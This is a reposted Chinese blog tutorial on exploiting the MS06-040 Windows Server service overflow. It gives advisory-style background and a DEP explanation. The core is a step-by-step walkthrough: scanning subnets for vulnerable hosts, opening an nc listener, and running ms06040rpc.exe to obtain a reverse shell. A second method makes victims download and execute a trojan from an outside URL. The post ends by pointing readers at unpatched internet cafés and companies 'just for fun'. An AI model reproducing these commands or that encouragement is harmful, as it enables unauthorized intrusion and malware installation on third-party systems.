【转】基于溢出的入侵
背景
Ms06040(Server服务中的缓冲区溢出漏洞)是继ms06035以后的又一个重大漏洞,利用此漏洞的魔波蠕虫已经开始蔓延,相信互连网又会因此掀起血雨腥风。
此漏洞的影响范围有多大?
这是一个远程执行代码漏洞。 成功利用此漏洞的攻击者可以远程完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
造成漏洞的原因是什么?
Server 服务中未经检查的缓冲区。
什么是 Server 服务?
Server 服务通过网络提供 RPC 支持和文件打印支持以及命名管道共享。 Server 服务允许共享您的本地资源(例如磁盘和打印机),以便网络上的其他用户可以访问。 它还允许在其他计算机和您的计算机上运行的应用程序之间进行命名管道通信(用于 RPC)。
攻击者可能利用此漏洞执行什么操作?
成功利用此漏洞的攻击者可以完全控制受影响的系统。
哪些人可能会利用此漏洞?
任何可向受影响的系统传送特制消息的匿名用户都可以尝试利用此漏洞。
攻击者能够如何利用此漏洞?
攻击者可能试图通过创建特制的消息并将其发送到受影响的系统来利用此漏洞。 这样,这些消息可能导致受影响的系统执行代码。
受此漏洞威胁最大的系统有哪些?
所有工作站和服务器均受此问题的威胁,其中由于该漏洞的独特特征以及受影响的代码路径,Windows 2000 系统受到的威胁最大。
实战
首先我们弄了个扫描工具:rpc-server Scanner IP地址填入你想扫描的网段,点“扫描全部”。
现在它已经开始工作了,去喝口水回来,已经全部扫描完毕
看到没,显示Vulnerable的就说明存在漏洞我们来利用,首先在开始运行里打开CMD用nc监听一个端口。
我这输入“Nc –l –vv –p 8888”, 监听8888端口。
现在我们开始溢出这是它的说明:
Usage: ms06040rpc.exe <host> <download url> <os type> ms06040rpc.exe <host> <reverse addr> <revser port> <os type> <download url>: such as:http://192.168.0.128/test.exe <reverse addr>: your host ip address <reverse port >:your host listenning port <os type(1/2)>: 1: win 2000sp4 2:win xpsp1
方法一:命令:ms06040rpc.exe 攻击的IP 你的IP 反弹端口 系统类型系统类型:“1”就是win 2000sp4“2”就是winxpsp1
举例:ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1
方法二:命令:ms06040rpc.exe 你的木马地址系统类型
举例:ms06040rpc.exe 192.168.209.128 http://www.hackbase.com/muma.exe 1溢出成功后就自动下载http://www.hackbase.com/muma.exe 并且执行
我们这输入ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1 192.168.209.128就是我要攻击的IP,192.168.137.1就是我的IP,8888就是我刚才用Nc监听的8888端口
提示发送成功
OK,我们的得到了一个SHELL,可以随心的控制他了
最后
很多人,包括一些大虾们都弄不懂为什么明明XPSP2和2003系统明明说了有漏洞可是不能利用呵呵,告诉大家,其实XPSP2用了DEP技术
因为DEP能够对各种程序进行监视,阻止病毒在受保护的内存位置运行有害代码。DEP通过处理器的NX(No eXecute)功能,查找内存中没有明确包含可执行代码的数据(这些数据有时会是病毒的源代码),找到这些数据后,NX将它们都标记为“不可执行”。以后如果某程序在内存中,试图执行这些带“不可执行”标记的代码,SP2将会自动关闭该程序。因此,假如你运行了一个已经染毒的软件,DEP就会把病毒代码标记为“不可执行”,这样就能阻止病毒在内存中运行,保护电脑中的文件免受蠕虫、病毒的传染破坏。
很多朋友犯迷糊了打个比方就是系统给每个合法的应用程序发一张名片,但是溢出程序的原理没有名片,就不能执行明白了吧,哈哈
很多网吧,很多大公司都有没打补丁请大家小心利用。JUST FOR FUN!
转载请注明出处:http://www.cnblogs.com/yydcdut/p/3515187.html
出处:http://yydcdut.cnblogs.com/
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 分享 3 个 .NET 开源的文件压缩处理库,助力快速实现文件压缩解压功能!
· Ollama——大语言模型本地部署的极速利器
· DeepSeek如何颠覆传统软件测试?测试工程师会被淘汰吗?